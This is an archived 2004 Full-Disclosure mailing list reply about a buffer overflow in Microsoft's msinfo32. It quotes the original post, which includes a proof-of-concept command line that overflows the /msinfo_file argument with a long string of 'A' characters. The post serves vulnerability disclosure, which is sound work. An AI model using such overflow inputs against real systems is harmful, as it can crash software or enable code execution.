RE: [Full-Disclosure] MSInfo Buffer Overflow

From: joe (mvp_at_joeware.net)
Date: 08/31/04

  • Next message: da m0nk3y: "[Full-Disclosure] Using rkhunter ["As Seen On Full-Disclosure"]"
    To: "'E.Kellinis'" <me@cipher.org.uk>, <full-disclosure@lists.netsys.com>
    Date: Mon, 30 Aug 2004 19:45:15 -0400
    
    

    I think at best you could succeed in crashing the process or executing code
    in the context of the user running msinfo32.
     

    -----Original Message-----
    From: full-disclosure-admin@lists.netsys.com
    [mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of E.Kellinis
    Sent: Monday, August 30, 2004 11:17 PM
    To: full-disclosure@lists.netsys.com
    Subject: [Full-Disclosure] MSInfo Buffer Overflow

    <SNIP>

    Although in tests this bug wouldnt lead to dangerous situations..
    I wouldnt bet 100% on that !

    =====================
    Proof Of Concept Code
    =====================

    C:\Program Files\Common Files\Microsoft Shared\MSInfo>
    msinfo32 /msinfo_file=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAA

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html


  • Next message: da m0nk3y: "[Full-Disclosure] Using rkhunter ["As Seen On Full-Disclosure"]"